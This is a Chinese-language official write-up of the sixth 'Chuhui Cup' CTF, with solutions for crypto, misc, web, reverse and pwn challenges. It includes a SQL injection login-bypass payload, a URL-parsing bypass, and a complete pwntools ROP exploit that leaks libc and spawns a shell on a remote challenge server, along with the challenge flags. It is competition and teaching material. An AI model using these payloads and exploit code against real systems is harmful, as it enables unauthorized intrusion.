第六届“楚慧杯”官方Write-up

前言

由于本次比赛承办方是我校，所以在本人和信安协会会长的py交易后，顺利拿到了本次比赛的wp。未经本人授权，禁止转载和发布！

正文

Crypto

Easy-RSA

sympy解方程一把梭

from sympy import Symbol, solve
from gmpy2 import *
from libnum import *

n = 27552304606229034903366058815849954030287648695063385362955432137790872571412035824128918674719247737295565001575991597519270789776408208970323808016733976338433371328100880898942106515627607388226912870981180215883273805491209461671730377099185278711453949265641966582563910708529619185885928310168288810488784242368160743359666583499117949407921812317700250240067929572558785431071173411100434109661677786734923283679392823901052633992456780285091988542875991410528415886437666510014123352497264017734716859350294159440761760921548702546470902740121962033241003215821780125194400741190925169397917247376657863011603
e = 65537
c = 8643831704675414121804983915084443744489969712473300784256427784417167322852556975560503484179280700293119974607254037642425650493676448134024809335297135239994950178868535219541095694358323044214971760829173918774094415933808417722001811285178546917655837402000771685507972240389565704149610032767242977174132826100177368764169367458684152505611469248099487912367364804360878611296860803835816266114046682291529593099394952245852157119233687981777202751472502060481232341206366584532964027749320641690448228420342308891797513656897566100268729012788419021059054907653832828437666012596894150751431936476816983845357
s =  3216514606297172806828066063738105740383963382396892688569683235383985567043193404185955880509592930874764682428425994713750665248099953457550673860782324431970917492727256948066013701406000049963109681898567026552657377599263519201715733179565306750754520746601394738797021362510415215113118083969304423858
# p = Symbol('p')
# q = Symbol('q')
# p, q = solve([p*q-n, p-q-s], [p,q])
# print(p,q)
p = 167604917202624171205562332547086795459018271995531662202392816766661852499967774267554085060619750182533064588995245441659492248123164548905239665224600839192261379211031757557080502863539123811164713057605073461933854926502162793803096063035806777877263036653498763650955936640215477205393488552237210705691
q = 164388402596326998398734266483348689718634308613134769513823133531277866932924580863368129180110157251658299906566819446945741582875064595447688991363818514760290461718304500609014489162133123761201603375706506435381197548902899274601380329856241471126508515906897368912158915277705061990280370468267906281833
d = invert(e, (p-1)*(q-1))
print(n2s(int(pow(c,d,n))))
# b'flag{9c0532a253809f180747b6da334b438f}'

EasyRandom

先用MT19937伪随机数预测出两个异或的数。因为tmp是urandom(3)，还给了sha256的结果，所以可以通过爆破得到tmp的值。异或之后得到(n1<<64)+(n2<<40)+n3的值，又根据位数可知正好错开了。取二进制的低40位为n3，爆破一下仿射密码得到flag16进制的最后十位。取中间一段为n2，和tmp异或一下得到flag16进制的中间6位。取前面一段异或一下得到flag16进制的前32位。把三部分拼起来再n2s得到最后的flag。

randist=[3693014292, 1999090277, 2812362804, 2118249952, 885988212, 1131999143, 3327925205, 731275596, 1818780432, 644434032, 3301077903, 1004325730, 113617890, 262927352, 1449581419, 1596910105, 3680959953, 4039323321, 2422810127, 946521915, 4049336142, 1299247828, 3361233447, 1319347681, 2858084207, 2493466845, 522894151, 3272590535, 2518746559, 113976089, 1912521614, 1971657011, 4052443472, 1928327357, 1481517158, 1707968618, 3946904293, 3941277234, 1740669853, 177473759, 2855945159, 3217808064, 568887441, 2243547768, 533475147, 4005163087, 1991762580, 1175403787, 1819485104, 4162426193, 2480060730, 1889558541, 1659122908, 2343813603, 1792751594, 3287109162, 4119020356, 2086904766, 4227102603, 4251617926, 386544361, 2024596798, 3275172220, 1652143183, 4279693598, 1741714555, 3920640884, 837190820, 4242688797, 3406136725, 272163458, 1933729342, 3348914742, 3483202044, 313505665, 3180958891, 276638359, 2247257889, 1283002827, 253470155, 2172073971, 3333335918, 321125332, 3478202657, 1298557332, 1255183068, 2347216752, 1823003608, 1873938039, 4172493668, 1252876713, 2877329304, 2733470437, 743814046, 1482554102, 3967801003, 4135521914, 1601509876, 1370623470, 564556001, 3369378190, 1930652933, 2684027015, 730072119, 3133537560, 554522157, 4200260396, 66286223, 2856462351, 3409097597, 1123352314, 3112249875, 660537433, 1027164908, 2875953843, 3419766147, 64818752, 1572659846, 176068922, 2155262681, 3154282688, 3215591301, 923444143, 54743986, 3011602372, 1936525684, 2636863705, 3228231549, 3660514246, 2503374986, 1180875896, 941948277, 1922552596, 740696852, 2337729160, 1636823570, 1788245610, 2970204367, 1597424641, 3940594526, 846332502, 3177694219, 1253960959, 1980517147, 2066843131, 3452017677, 743662084, 3332614739, 1230416894, 1790783329, 3339256849, 1223003548, 3155010716, 211801309, 3302823875, 2203405123, 4027118331, 3928670766, 1551556760, 2018355543, 2473765725, 2451139992, 3923372144, 2197282188, 2056399604, 1294675076, 1121984516, 113881691, 1646921221, 3151728031, 695534775, 3870352246, 1614457851, 1764207471, 3516853329, 3276173646, 3559299512, 1239291648, 2417317314, 908861203, 3945977517, 1789725976, 1094256533, 1194981603, 3817224425, 4294621339, 3041360046, 1319794040, 1881403289, 151945988, 3036988698, 2214811128, 240957157, 509921068, 1538884056, 119208760, 1425862614, 2923918837, 845827337, 507023267, 2955299274, 1247972138, 766611587, 2012831811, 3441161631, 2645633381, 2328705244, 512481283, 461960350, 1704754200, 1327914555, 147555684, 3349647800, 3062151439, 3090502250, 937966533, 82567652, 725403325, 4001427888, 524069543, 2291211027, 2084465414, 1292961088, 4278389999, 1309916992, 3249380344, 3493113838, 83526738, 4193860366, 2438456426, 3510215857, 175761668, 2820499306, 1792194251, 1225332544, 3896268058, 2752286952, 3182785082, 956435024, 3996152048, 2924148655, 2895936126, 1856977607, 1289267397, 690722358, 1937429718, 1531967867, 2098208046, 1815108525, 1567735201, 146084074, 2093897143, 2793246617, 1146380003, 2523936201, 2301399576, 2052473947, 3470101770, 3722302451, 3345343326, 2271545308, 2657475692, 2211989611, 2428885922, 2097052181, 3554955904, 1704837589, 1494941216, 3403108634, 911409695, 3550042769, 379101531, 406655201, 1317011271, 2336674904, 3930303124, 3038552846, 3207659329, 2785076651, 1203119790, 1146774748, 2218279443, 494710315, 3507507044, 922439915, 35699688, 2690622469, 1458912003, 3911367650, 983115567, 2813252332, 839947939, 514499603, 3894529528, 326817358, 1479783722, 4242051909, 3492972915, 3473946915, 3348053727, 3681386488, 584266203, 3531080708, 3262223061, 2904040234, 3897643811, 2706405422, 914107260, 3011659451, 308811435, 4103121550, 4023430755, 2975129044, 4139500620, 1763891748, 57665971, 3149249501, 870034516, 4142837134, 3130156432, 1708266697, 1242161643, 1163332264, 108174709, 1633896347, 2820171620, 1708875131, 724124719, 3562786877, 518616285, 3643662732, 3375737681, 2550728441, 1823319080, 1775922455, 3838709569, 177763087, 946611206, 4054832304, 1473954380, 3475817789, 2590152780, 3587873907, 3437231816, 2708036272, 3883447173, 655291275, 707049339, 1352718730, 3543000675, 962283943, 4170075509, 1897499376, 643615933, 856277089, 3299581344, 4093601146, 2638625975, 1563647962, 890552183, 3138216177, 222946344, 4219020514, 3218803481, 3093722090, 1210144957, 3499543439, 4239553976, 3582176749, 654186756, 3005601303, 1252241368, 2459425960, 3587113096, 3506651695, 3673557784, 4157576483, 733173716, 1505997631, 394626148, 1322270695, 84604461, 891267254, 518241635, 1068682198, 3696554893, 3111393676, 1398539042, 901276151, 483471144, 1952219546, 2884270239, 2215979688, 4138748504, 1623101775, 3102260771, 4276348310, 1228132323, 2250922664, 833982365, 3402246096, 2085678412, 2707953187, 590837194, 3421635592, 3488064851, 3655525766, 1029679348, 2448841196, 89284911, 3970560858, 334986490, 3063032848, 3172506167, 2391313449, 3589023591, 4269870234, 3275101066, 1716650872, 483502324, 2116979028, 815078501, 3475316209, 1003463022, 2418993968, 4251101825, 346290993, 3286645593, 2654742976, 99974317, 4124695845, 3732280507, 1536249568, 1440486445, 1605422491, 393607563, 1141210694, 43848150, 1656624711, 2170355702, 327988021, 974870171, 2169013815, 3689546490, 3576028106, 4258679518, 14944446, 1786133397, 264814384, 1969519378, 1769400868, 3098042628, 22547518, 3195136230, 42683806, 1288550835, 59638233, 3534385409, 2517101496, 3632913591, 3894777481, 2912655780, 1614602217, 3498478791, 1309795895, 3961554801, 3625321205, 308138165, 2885107341, 1003378866, 3462951062, 1914176024, 3130918711, 3919345882, 3556964414, 2382442356, 3968605965, 2388890395, 1955471760, 2358533573, 2323037969, 4273118548, 3577096972, 4251790958, 2321545863, 2057106840, 4000766037, 1551111470, 368761666, 951769999, 778229999, 4235748487, 2020142699, 3577752281, 1269488993, 1350156870, 529843408, 669182431, 3871401874, 2180265713, 3850183472, 46915226, 3150800412, 1139932212, 2523557119, 1462042012, 301258444, 165757583, 530704729, 1848179734, 1792342751, 2597916820, 4041946457, 1127104524, 3768573884, 2614008065, 741308521, 477746986, 507411825, 4235293189, 2251811519, 811234592, 1985999307, 844715613, 1640781314, 3538036580, 2764130557, 2863454433, 1831736583, 3857379783, 658928449, 1149649578, 103125751, 2968446555, 885660863, 707321834, 1728646363, 2706995220, 3062604255, 4177710084, 3076079677, 879366858, 3936728615, 8828906, 1656874220, 2904085639, 397694272, 1604508691, 2083663236, 2138468690, 1365350684, 2870684769, 384435793, 1063724290, 1142482048, 809857977, 4192515435, 267878653, 206018017, 3441769173, 925696591, 2250932557, 1973183700, 577661907, 2551314381, 1350352597, 4151551172, 774849773, 2391866106, 3444137245, 403261487, 2724363448, 3572536490, 1077243504, 302416473, 3457548858, 564604707, 1238169871, 2356838464, 3083335214, 3844937218, 1272458074, 1782962159, 1543604321, 3212537899, 426074894, 3053843067, 2436223151, 94019340, 4147659323, 2893920832, 626619793, 3976626567, 1884877146, 2696384440, 1177352315, 1082374195, 3289271804, 1485815836, 120127000, 3349349501, 164243314, 1703351326, 1017276501, 413737931, 408060344, 472141408, 172738862, 4001606849, 1888805432, 2927218529, 1293362241, 1941759619, 1760659398, 274865852, 978985751, 3867215904, 177291528, 1083045308, 3888975618, 979933689, 2211634008, 3899294132, 1174569575]
Hash='b0cfb7293d6842e3279f4ef0fc88284174349e111e5b9beb28263df72c9db0bf'
res=1045726758250168034320246515934682860724576730763168865120


from mt19937predictor import MT19937Predictor
from libnum import *
predictor = MT19937Predictor()
for i in randist:
    predictor.setrandbits(i, 32)
x = predictor.getrandbits(128)

from os import urandom
from hashlib import *
from tqdm import tqdm


# for i in tqdm(range(256)):
#     for j in range(256):
#         for k in range(256):
#             if sha256(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big')).hexdigest() == Hash:
#                 print(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big'))
#                 exit()

tmp = b'\xfeV\xe8'
# y = predictor.getrandbits(192)
# print(res ^ y)
# print(bin(3096872116674666632134706098360014813425478687167245803096)[2:])

res = '11111100100110011011010100000010100111101010001110010110101000111010000101111001111100001100100001111110000100000010001010110111001001000101111101101110101101110110111010111010101111001011000'
n3 = res[151:]
n3 = int(n3, 2)
n3 = hex(n3)[2:]

def affine(s):
    return hex((int(s,16)*13+7)%16)[2]

from string import *

flag3 = ''
for i in str(n3):
    for j in digits + 'abcdef':
        if hex((int(j, 16)*13+7)%16)[2] == i:
            flag3 += j
# print(flag3)
# 64406e6365

tmp = int(tmp.hex(), 16)
n2 = int(res[127:151], 2)
print(hex(n2 ^ tmp)[2:])
# 6c795f
# for i in range(10, 135):
#     n1 = int(res[:i], 2)
#     if len(hex(n1 ^ x)[2:]) == 32:
#         print(i)
#         print(hex(n1 ^ x)[2:])


# flag = 0x16ef9b7e65eaccdac7f2a82242f97461fe795f64406e6365
# print(n2s(flag))
# flag = 0x365ac09e91965ba65b83ea0952bf789afe795f64406e6365
# print(n2s(flag))
flag = 0x7730775f796f755f63616e5f7233616c6c795f64406e6365
print(n2s(flag))
# flag = 0xf5e518dca89d28ad12a466f3332b5280fe795f64406e6365
# print(n2s(flag))

# flag{w0w_you_can_r3ally_d@nce}

Puzzle

先不断用c3pto函数得到key的值，因为在明文前面填充了iv，所以第一轮CBC加密时相当于0。因此先用ECB模式加密16个0就可以得到iv的值。解密之后去掉前16位iv再b2l得到n的值。又因为n是p的k次方，k是3到10的随机数，所以可以通过iroot来爆破得到p和k的值。然后phi就是p^4-p^3，常规rsa解密即可。

from Crypto.Util.number import *

# ans = 38003142990385686484863558905791098358375993231657244276476071305023256088640
# for i in range(3000):
#     ans = c3pto(ans)
#     if len(long_to_bytes(ans)) == 16:
#         print(long_to_bytes(ans))
#         print(i)
#         break
key = b'\xe3+\x91\t\x98\xf3\x1e\xc1:GdW\xa7\x9c\xed\xc8'

cipher = b'GuGfliJiRkNsUbbmB+g/q4U3z6YahJ6G1Q9bg6ZT/ilJnkNMICmQYMFuhlNBuVZHfJJIFwwFJ5FKG+z9zSXalJq6quN6d3CSYSMHvYk04Orpn76Y2VQX5qQk72uCssd4x5KNIOmX0CvzJmjTWjLvL1U5twQupfkuDr/axqyHFss3pJkj9o0IRZmtz87bi5WojeUjOaayQ0RNenJJzhJ+zFJwdUCpUhwotHxLOPsUXYSoY7AKPwj53Dlsy0deNBKFN89BolC4pTwHWvn0M/8eu9kIze+5sQuKrk0VI5ASNzA6PRp1owpgsxNuy18k6/y01+mVheQkFrH2IrFNgqe3+Gu/PXEDPi3G2nAIi/4Xf9QI0DNH+hkoN40zWaX3OkEVQeLQ9o/KuggeoajYwDusFyQxOQZYFr5I+v8uBApcQz29bKIRiZX78r9YN3IaSsL0JgLPQPYaNPNiZMm5pqmv/zV0poZikYGYJsAwfjLJ/CYQ/iLBhkhKZoE9VxYEae7Wga1jwpJb3h/lA3mbvQofMTR6ivnSZHzUu3elxMFTgTi5adB4PsBdke0YRXlWP8/AoggBAN5OMw8n2LCASIhp7q/1iljNUuw/40mBCt75jszo1eBBDAbP7/DjXL5hUHFgen6xjedcySq/H0ibyNGasyePs3e+igr78fHyvXyIYYPaEtM4RjC3j3TXheRYRo9lObJgHUHSY0PgAgrqc1rECexNa+QCvzzapemNAEE9OT8YLOEkB6zzpSrZ6k/NR9KffGnqplQlWAfXdDrf3SsOmWVJ3G6DvmpTCukQgVYn+DCv5LdSSUZo2hjxBHPv8C5zpZiasPLDr+2CwUvccettO3wwrWQ1bPfRBZ7OSghvipbYI7awjt45tyxT5TopN7e3kud1s4bdm7da/KQDDQ3pxylH7Kc2b8wWfptW2t9wEoqdjNezr24E+/c6kNIo9TmZ8mPigNBz/d7Sd5TzxhstmXoXscAvFLpc7B/RhD5qwXWlYZwisemsTL6GVgBpaWI0zp4pk4DaQcT7FM17qddeHCiF5YD9g6TZBkYXnvke5hW1JERYny3GjTNum8P3p9L3NHWpfAK2S90ChRwDb3nDy81B6b6K+YMNsJmmMjJhE/GbP6jMFE/2cLIAsAT+Ssk/zNEJKXKe3gN4pQzBcDJksDxrlYJoYQE/rz1Ni7EpKiuuEUtODcGSCcRagh6t6cJVyDh76DgxgjAvjATjPS6bdJ5PQWocTtjoMUvkMjbeEoWMuoe5cgsHl3HoYsLyxWwk1zn4BVSdjumiD0o8juKUTFsFjN8yyNQyAA4KNRrhrIBdK8VTcsJC5JFjJnJiX1P6yrUWZPnH4YB3wIZwA5EkXjlgtNrZghyWTMNoMs4GH6A='
from base64 import *
# print(b64decode(cipher))
from Crypto.Cipher import AES
aes = AES.new(key, AES.MODE_ECB)
iv = aes.encrypt(b'0'*16)
# iv = b'<\xf1t)J\xb94\x94\x96k\xb3\xa6\xd0l\x1f\x18'
# print(len(iv))
aes = AES.new(key, AES.MODE_CBC, iv)
# print(bytes_to_long(aes.decrypt(b64decode(cipher))[16:]))
n = 192099659971585644585994265356151893462377034960456794411988891865292985043855003153008582523342780428794810302819600257505211543181857907106415116235678327109890992104863370288179222517757670217778339429390238355802091081769000348240713104001227465195009290503347809694648095737603288589286587488951249122808668565718081375241590144993161651582987613212486939491481151331461062699460189663231086086438368188327851901136662178362187582946879512941211019554239356512237609083714797677920647956302526035540976096625395045576074618882913271336136197136983455626303177930159461486947144900160609689255459511724884379858318269727855760842754096692298627624434916921714588784746851193083162412064551556945404206854303755771760752959780690233660596074620616291920828653736584021095005924141651891036415545086668712524203621422434855332350634434410255685899978575653707114060202874964589333127633649581915659487394392054766924938473585908627256425677898409670003835577877230695953230779772624257018952499735317822119685099669750110189929339815489604592011705747522509443099530871227359100112168474188213599742539558713508525377201675194485642343270883438486906530571528359024979260422106335247512597006126883635090340753475080689838573417741101697005667509804117477078714343224837766971175288554228364175312803060405952234277289653353821049167680289322424370730116331485806992442330752262754657170209301796826520903516939270541484630918051998431104746567068050303837266511857593664457675203874622377426656951134697321668662464768461125119491757074002358277630438779981831394788463952738787381176350532134825112678994090733193226361777537532269515922485937976349665991399772388721397960468392351155664481353730638831836994949983037350384382753327305729403941493686341892251753278811372338966651828844911034352886809190060883995056847456555950315611326987545276629529435068813158170690823902054787362572088738335891773343913632258874832438998334332913261810760087047758552754566575308536675397251987093487164542963055804002441751864022715424662848335470359948420027756835213050500577294799638589135949755879898985814242501638839907383377834819866500082619067419468232672548637154121177897443704368253245514204975147693342503301921844252239673318375741456151277008424086433210309669337358030499431697081307189511178107489812792122478536534259554160073644974772253911579253927334216606449192146737795612311912838169178570116934403812068138348378295739329366212651044519758844001
e = 0x5b0cd450a7bfb679dc9caa8aa6fc131708fca2a34375d049ac035fb019463d9c3fa11adb0eb51dea1ae85223df59f887a12ab376cbcb272681c3872c57f4da27396052242b608e3ea4ff53061e63bbfdff652ce25f4ce73315fd1a73a5d5e7307402c7a3c6c1a80c63297b441125c38e23729da6473e5dc332e4e7201df25ff6c8b9918b262e56a31bebe13e093e6f4dba47a771961358cedf6d740732425cb708a633d538dcdc12ef7b49ce76aa270f50dd7cc1b879f1d7b19c6ac3b891fe4e20fb7645b7567237775881de7d30ba754d495ffe8ee751d1cfee1c661a2dbf13a53ff1bcf8085b39f6508fbf37137ebad659665fe5fcc67eef02970a44ac675e28103bd10f2045983d5adaa909b18b70a909b08b76c21b2798830276068d0ebd27303985bb5f3e681219a50bc761b7630587743768cf61922804d195e265aaaabb4740a2c5d7e8ff4e1c19cfb534d345f537e95e948591557f3136da617657e24d1904be373f5e7d63af330b837bcc662cbcd801eb436dbbeb714469d227e9f17e118db39eeb42e45455e6daf4d8fe0e19c4457b596c20e1ef8d235b230018a58e1c66c52c7317094aa5797f50a3b5ebe2be2abd1a04d907fbb68919956d7b0939ac0195a3f3bd3eb6f08eef67a895807768250172ec6bb2b35c9962de03df847170472b73981c04f2aef03721554c818ec9eb7f625d1a3fcdcf756adc4b6fd61950724ac2164a94df70f4aa1cc36c51dd2c3b6545c6c2233544254f6a24e6a170918fd0c533734ef859fed3c5d6f1f9acf8d3b77804c98fa5f1429763ebe860a77380a1e94626b46d88e5263855a0a0d226eb7ca64824c9a06acda851e650e6b035c04e27de61cd49ff49ac3ea3407440f9e76ce47c02301c1bc9c28befe0cd1f5b999961b055ffb39e2f451302aaedc5d779da03830bda1ed3ba9be4f23b2381096f3dc60c84a91ba0aa44242cc6aa361e2ecac867a2d1ef6868199ecb3004aa62bd56683c3476a9bd3f0316905e4f83ef5a907d9796231b9f506c82c09c739513a0db04467a071dcc34cb11bbba8cd3f1870174e04160ae74c2160a61a7c472e8edc51e969a2f0fb47cee59b67d401ecb13b06f72dcfb24f5850b8921b8bad14f7c6bd123c13b3a2ea1761fc425066ba107d61e96d2fa9b3ed88befec93578495ef4c7a1eb95d76679d1f5261f0202e1de881c5c5b1fb44f471a75a305d86df1123cd83c8bc9449c73cf34dbd247111c873bc1fc7948863bb59f2ac3d7129c2e7c3e0ef94afb38a01b3e42f83f42a5cc8e14cbe53c0c8d76768cdc98bef921aaca60204519b516d4c9de7cf581eec8a53faa2e2d96722d0ef2c23d5567ba48104890534cd84432565236cb3402504e0feb6c25426c52d2b2b42f10a007cdd38b540cf64a96ee784deb2b595deb4a9497f9a25ab06eab443010b66e7decc162dcbd7de12737d72a46ec0b8151e1ed42716af2c7602692d7c0ea757bc056c89d2640773a4c3c1a2297c87c13676e414003ff3af0d1abb87ba618e24a4dfe05c0b4443bda53d26c7e30f0dec498d9091074fe3444e81b9a4d8d7acc8b1e38f6afc63540a4e8880fd73bd34bc3563cc0a98bd35ce7455d5cf8a114bc2fe2fb9a58e725cc121e4e242fc0a9a8e38615bda67fd9f158e718154eb51d0ec3d941426933e36fba1db0d7b59d52be90aa796895e6a49fed0a7887b8d7c71a9aa023a8dc73391e3d1bfc746cde9f964d99625900624a8eb300f2d7d2f8703f470776088f27aaa72e7607dcd78cf63754cec00db23bb36beb48cffb20a06df884f101a9
c = 0x26c6b16ed40253ff31bdcd502d63230a9655f29599cfb41a29f10e700589e6a13a8c78f483e0aa8b9353fa258a1437ba15e8d2c8bb2b090a6887740b31d71550745611fabd087904f150b4d928d155a7fcdd1a64c7349ce984dfd08c4c795e93b409f53c1458e6de777dc5993198f4c0648381116fe5cbafa57499d9ce685c625df4797afc344e8fe4a0fc36cf82ba1423c8a4ad7a33bc4cbab25e2df729085f96d3d9d542d981fa46cac8a37ceb70b9f808213845c06b72be7e2d1224e4dc02817bd474c690e43f6d8f1916a20f2e078bfaa604343d695e6f5f88d9f11c43a886ff97d9bd26b0126af40bed8e03a43bf8c912b5b0dd2f9f2e7e99db066759f573cd59a40a554bebdd3e7e0adbc38fcb91adeb72f9dcd30558b082471a02fd9131a61cf29b1f4e38a5d689d8dcd0b8dc29075e3a33b2d6a25bee6ff9e20d269cc088a2b155be76a1531ce30b25edf928990b5143fc5ae2737d8d4070d0517f5137c458d7afed8f51e2c2973dd143235c9deaffe9ce8fbcd767a93573399dafd5ef61408c77302c993354a080684cdbfb7c1eeb6e6be907db790038c7ce62517815d16fe366bd26178f2f05b9e56450814f4ba7ab6cab54c5f78316b0451057785c03a77c20814eb405cd20e5bff5247a12500dd16173125ffdef4fb6317ab942d0d7e0e584a8fd97a8ba8d87fd38127d6d059902a2d48dafd10938ea5d108f3eb986aabf9e212151b0e540bb5fd25888143633be9982395d4d3bef5278be37328e0239569eb511698ef7f9e7e12aa204cb4c069ffcdeecb65f42ba37f7bfd47c4ba8df384a88adf3486b58cc1620185ac81dfb10f591fc82f3ae046341ebd1e8288f10500d6677e91b89729dfd299b74be13a9183725aacb0023f4fb01efda61390b0312d90ff6a9a319433681ad1811efe038fcdeb6dc1c3f594c4f8011aacfee74ea9638fccb3d669435a1208578c934277caa3ec74f9efbb33e024909b121e7b4e48ec94b762fa9dcab8a1c11b86bb9db164c7655504d304661e04e95b0b356f5968334596fb11df95bbdcb3a6618f431c864658827662f760fc86b2136221bd50472dc19c4f177eb5edf7978760dc15150cfda0a3ea649cb672b8f37229298c6edcc630e3ac9a5f43f58a93ba8def335472f7ebdedd7715a27c4ea622344a949bec59af030455ed61911d53388022bd502e800b769ef499f94f02c96f486b40ce68dbdc42e5690ac2992bedf7f0ba384504c32cb00a25d4e125483003152e81ebe9c12d928627d7f14fc3fbdf5141addc477d5ae4f32e64dcb58a6e2cf955ad7ae54e1665b3199bd0fae36b9ec56c09ac00efc9d27e69a93f4e08652edc3340fa2c518d388ee4a005b9c83956b9139b98380f6925a1a4c3e64ff8d96f2827d0d8a25cc72a2c03a28e33871284b46e10c85f2ad75969b1d84e9d88bb4e05d


from gmpy2 import *
from libnum import *
# for k in range(3, 10):
#     if iroot(n, k)[1]:
#         print(iroot(n, k)[0])
#         print(k)
k = 4 
p = 20935418603755826153357961486749000137883878122092541278485245382546346099923598569473814209357669395236788185259189925906627960621490996925200115559569329810746744675867738485473466021581185385430988547168263735484625716958718825113577345085361945421237478366338611831738408648424304228723729310335432168121087334054958276987167490905779911687736536416815227240962562460212183301435420718431023950641725670461044591993133883921646824589614644103106984493917214402278641218422432546374433956301830629567708335305598359150744372547912472684947785245810663217040977994966632748245272393755319650187559761562868158211001
print(isPrime(p))
phi = p ** 4 - p ** 3
d = invert(e, phi)
print(n2s(int(pow(c, d, n)))[64:])
# b'flag{6354ce3ac23cdfeccf16eb1a53df4423}'

Misc

一袋米

搜到原题

https://blog.csdn.net/weixin_46079186/article/details/120941245

将Yahiko.png用winrar压缩成zip，用ARCHPR工具进行明文攻击。解压进docx之后全选修改颜色为红色得到flag

flag{c05909321b5e318bf6b0e41586f31882}

国际歌

用foremost提取出一张bmp图片，用stegsolve打开，Analyse选择Data Extract，勾选r,g,b的三个0通道，save bin得到flag的图片。

Host_log

搜到原题

https://blog.csdn.net/weixin_46079186/article/details/120941245

写个脚本，先把4个文件放一块，得到所有的ip，一个一个ip过滤，把ip出现多次的都过滤掉了，最后发现了8.8.4.4，只出现过一次。查找到ip：192.168.100.115，账号名：lucy。

flag{192.168.100.115-lucy}

Web

web两个送分题。。

baby_sql

输入admin 123的时候显示 you are not admin

然后尝试了一下万能密码 Hack detected 然后fuzz了一下发现好多都被ban了。

然后之前遇到过BUUCTF的一道题目，是利用到 \ 来转义引号，然后实现注入的。

payload

username=admin&password=||1=1# 

本来以为可能是考察盲注，结果登录进去就有flag 。。。

Easy-WEB

打开是个登录框，随便试了一下注入，未果。用dirsearch扫了一下，扫到一个 /.DS_Store

然后看到看里面的内容可以发现 有几个php 文件 。先访问了那个yzmcode.php 没啥思路，后面又访问了一下yfhgyrt.php 拿到源码：

<?php
header("content-type:text/html;charset=utf-8");
include("./flag.php");
show_source(__FILE__);

if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    if(!$url){
        die('Can not parse url: '.$_GET['url']);
    }
    if(substr($_GET['url'], strlen('http://'), strlen('google.cn')) === 'google.cn'){
        die('Hey, 老哥, 你会绕过吗!');
    }
    if(
        $url['host'] === 'google.cn'
    ){
        echo "flag{".$flag."}";
    }else{
        die('老哥！！！');
    }
}
?> 

没啥难度，直接用@格式绕过就行

payload

http://47.101.38.214:50002/yfhgyrt.php?url=http://My0n9s@google.cn/

Reverse

s.apk

APK的题目，直接先拖进jeb里面静态分析一下，主逻辑在MainActivity里面，反编译看一下

直接一个checkSN函数，第一个参数是”Tenshine”，第二个参数是输入的内容

再看看这个函数的内容

逻辑也很简单，就是MD5(参数1)结果的偶数位拼接，加上flag{}包裹后和参数2对比，相当即正确

exp

tmp2 = 'b9c77224ff234f27ac6badf83b855c76'         # md5("Tenshine")

for i in range(len(tmp2)):
    if i % 2 ==0:
        print(tmp2[i],end='')
# flag{bc72f242a6af3857}

爱生活dota

32位，无壳，拖进IDA看

逻辑就在主函数，很简单，贴一下简单的分析

就是一个用户名和密码，用户名直接给了是StarsWarss，密码有个简单的异或，反推即可

exp

text = [0x76, 0x2A, 0x1F, 0x58, 0x33, 0x2B, 0x38, 0x76, 0x5F, 0x44,
        0x79]

tmp = 'WuSheng2009'

for i in range(len(text)):
    print(chr(text[i] ^ ord(tmp[i])), end='')
# 拼接一下
# KEY{StarsWarss!_L0VE_Dot@}

Pwn

math

就是个栈溢出，但是输入size那里有个abs32取绝对值再取余，在储存有符号数的时候，补码的范围决定了最小的负数（-0x80000000）取绝对值后的结果无法表示，所以此时取绝对值后的结果还是（-0x80000000），然后就可以读入0xe0的内容，接着，puts泄露libc，打onegadget

from pwn import * 
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')

p = remote("47.100.117.2",10005)
#p = process("./math")
elf = ELF("./math")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi = 0x400813 #pop rdi;ret
main = 0x40075b
ret = 0x400566


p.sendlineafter("size\n",str(int(-0x80000000)))
#gdb.attach(p)
payload = 'a'*(0x40)+ 'b'*0x8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.send(payload)
p.recvuntil('\n')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
log.info("puts_addr="+hex(puts_addr))

libc_base = puts_addr-libc.sym["puts"]
log.info("libc_base="+hex(libc_base))
ogg = libc_base+0x4f432

p.sendlineafter("size\n",str(int(-0x80000000)))

payload1 = 'a'*(0x40)+ 'b'*0x8+p64(ret)+p64(ogg)
p.send(payload1)
p.interactive()